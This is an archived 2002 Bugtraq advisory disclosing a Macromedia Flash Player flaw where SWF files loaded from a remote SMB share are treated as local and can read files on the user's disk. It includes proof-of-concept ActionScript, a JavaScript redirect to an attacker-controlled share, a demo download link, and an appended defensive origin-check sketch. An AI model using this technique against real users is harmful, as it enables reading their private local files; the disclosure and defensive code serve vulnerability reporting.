Bugtraq mailing list archives

Flash player can read local files


From: jelmer <jkuperus () xs1 xs4all nl>
Date: Sun, 6 Oct 2002 14:24:00 +0200 (CEST)


The following message apparently bounced the first time I sent it :s

Flash player can read local files

Description

There is a flaw in the Macromedia Flash Player which allows reading and
sending of local files.
The flaw lies in the fact that when a Flash movie is loaded from a remote
SMB share it is treated as though it was loaded from the user's hard disk,
allowing the following ActionScript code to work:

urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");

function readXML() {
 myField = urlXML.toString();
}

It uses Flash's XML control to read and display the contents of
c:\jelmer.txt.
In order for it to work, one has to get a user to view a specially crafted
webpage, which could look like this:

<script language="javascript">
 document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>

It points the browser to the SWF on the SMB share so that it displays it.

Demonstration

Download the following file and extract the contained SWF to a remote
share, then start it from there (for instance by dragging it from the share
into Explorer or creating an HTML file as described above).

http://www.xs4all.nl/~jkuperus/exploit.zip

It will read and display the contents of c:\jelmer.txt.

A live demonstration is not provided because it really isn't good practice
to open up SMB shares to the outside world and I am only able to host this
sort of stuff at my home server.

Vendor status

Macromedia was notified a long time ago; as far as I know they are still
looking into it.
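
The origin check whose absence the advisory describes, sketched as an added example (not part of the original post and not Macromedia's code): a movie location is treated as local only when it names a disk on this machine, so UNC shares and file:// URLs with a host count as remote. The names classifyMovieOrigin and mayLoad, the rule that only a local movie may load filesystem targets, and the address 192.0.2.10 standing in for HOST_IP are assumptions.

```javascript
'use strict';
// Added example, not Macromedia's code. Windows-style paths assumed.
// Limitation: a drive letter mapped to a network share still looks local
// to a string check; a real player must also ask the OS for the drive type.

const NET_SCHEME = /^(?!file:)[a-z][a-z0-9+.-]+:/i; // http:, ftp:, ... (not "C:")
const DRIVE_PATH = /^[a-z]:\//i;                    // C:/...

// Returns 'local' only when the location names a disk on this machine.
function classifyMovieOrigin(location) {
  // Treat \\host\share and //host/share the same way.
  let loc = String(location).trim().replace(/\\/g, '/');

  // Device prefix: //?/C:/x is local, //?/UNC/host/share is a share.
  const dev = /^\/\/[?.]\/(.*)$/.exec(loc);
  if (dev) {
    if (/^UNC\//i.test(dev[1])) return 'remote';
    loc = dev[1];
  }
  if (/^file:/i.test(loc)) {
    const rest = loc.slice(5);
    const slashes = /^\/*/.exec(rest)[0].length;
    let path = rest.slice(slashes);
    if (slashes === 2) {
      // file://HOST/path: only "localhost" names this machine.
      const cut = path.indexOf('/');
      if (cut < 0 || path.slice(0, cut).toLowerCase() !== 'localhost') return 'remote';
      path = path.slice(cut + 1);
    } else if (slashes !== 1 && slashes !== 3) {
      return 'remote'; // file:////host/share and similar UNC encodings
    }
    return DRIVE_PATH.test(path) ? 'local' : 'remote';
  }
  if (NET_SCHEME.test(loc) || loc.startsWith('//')) return 'remote';
  return DRIVE_PATH.test(loc) ? 'local' : 'remote'; // default deny
}

// A movie may load a filesystem target only if the movie itself is local.
function mayLoad(movieLocation, target) {
  const isFilesystemTarget = !NET_SCHEME.test(String(target).trim());
  return !isFilesystemTarget || classifyMovieOrigin(movieLocation) === 'local';
}

// Constructed sample: the advisory's share path with HOST_IP as 192.0.2.10.
console.log(mayLoad('\\\\192.0.2.10\\exploit\\read.swf', 'file:///C:/jelmer.txt')); // false
```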


